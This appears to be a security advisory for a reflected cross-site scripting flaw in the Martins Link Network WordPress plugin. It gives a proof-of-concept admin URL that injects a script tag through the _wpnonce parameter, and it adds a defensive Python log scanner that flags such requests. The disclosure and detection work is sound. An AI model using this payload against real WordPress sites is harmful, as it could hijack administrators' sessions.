Description
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue which could be used against high-privilege users such as admins.
Make a logged-in admin open https://example.com/wp-admin/plugins.php?action=deactivate&plugin=martins-link-network%2FmartinsLinkNetwork.php&plugin_status=all&paged=1&s&_wpnonce='><script>alert(/XSS/)</script><a href='
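A log check for the request shape above, as an added example that is not part of the original advisory or the plugin's code: it flags `plugins.php` requests whose `_wpnonce` value is not nonce-shaped. It assumes combined-format access logs and that a genuine WordPress nonce is 10 lowercase hex characters; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a genuine WordPress nonce is exactly 10 lowercase hex characters.
NONCE_RE = re.compile(r"[0-9a-f]{10}")
# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_nonces(target):
    """Return decoded _wpnonce values on plugins.php that are not nonce-shaped."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/plugins.php"):
        return []
    # parse_qs percent-decodes values, so encoded markup is seen in clear.
    params = parse_qs(parts.query, keep_blank_values=True)
    return [v for v in params.get("_wpnonce", []) if not NONCE_RE.fullmatch(v)]

def scan_log(lines):
    """Return (line_number, bad_values) for every log line worth reviewing."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_nonces(match.group(1))
        if bad:
            hits.append((number, bad))
    return hits

# Constructed sample log lines (not taken from any real server).
BASE = ("/wp-admin/plugins.php?action=deactivate"
        "&plugin=martins-link-network%2FmartinsLinkNetwork.php"
        "&plugin_status=all&paged=1&s&_wpnonce=")
ENCODED = "%27%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E%3Ca%20href%3D%27"
LOG_FORMAT = '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET {} HTTP/1.1" 200 5120'
SAMPLE_LOG = [
    LOG_FORMAT.format(BASE + "0a1b2c3d4e"),     # normal deactivate click
    LOG_FORMAT.format(BASE + ENCODED),          # request shape from this advisory
    LOG_FORMAT.format("/index.php?s=%3Cb%3E"),  # other endpoint, out of scope here
]

if __name__ == "__main__":
    for number, bad in scan_log(SAMPLE_LOG):
        print("line %d: unexpected _wpnonce %r" % (number, bad))
```

A hit only shows that such a link was requested; whether the script ran depends on the plugin version installed at the time.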
CPE | Name | Operator | Version |
---|---|---|---|
 | | eq | 1.2.30 |